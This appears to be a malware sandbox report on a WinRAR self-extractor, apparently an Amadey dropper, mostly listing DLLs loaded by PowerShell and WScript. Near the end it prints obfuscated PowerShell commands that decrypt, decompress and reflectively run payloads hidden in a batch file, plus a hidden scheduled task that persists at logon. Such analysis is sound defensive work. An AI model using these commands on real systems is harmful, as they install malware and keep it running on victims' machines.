Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: jcgLYlM4dg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: jcgLYlM4dg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe

Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
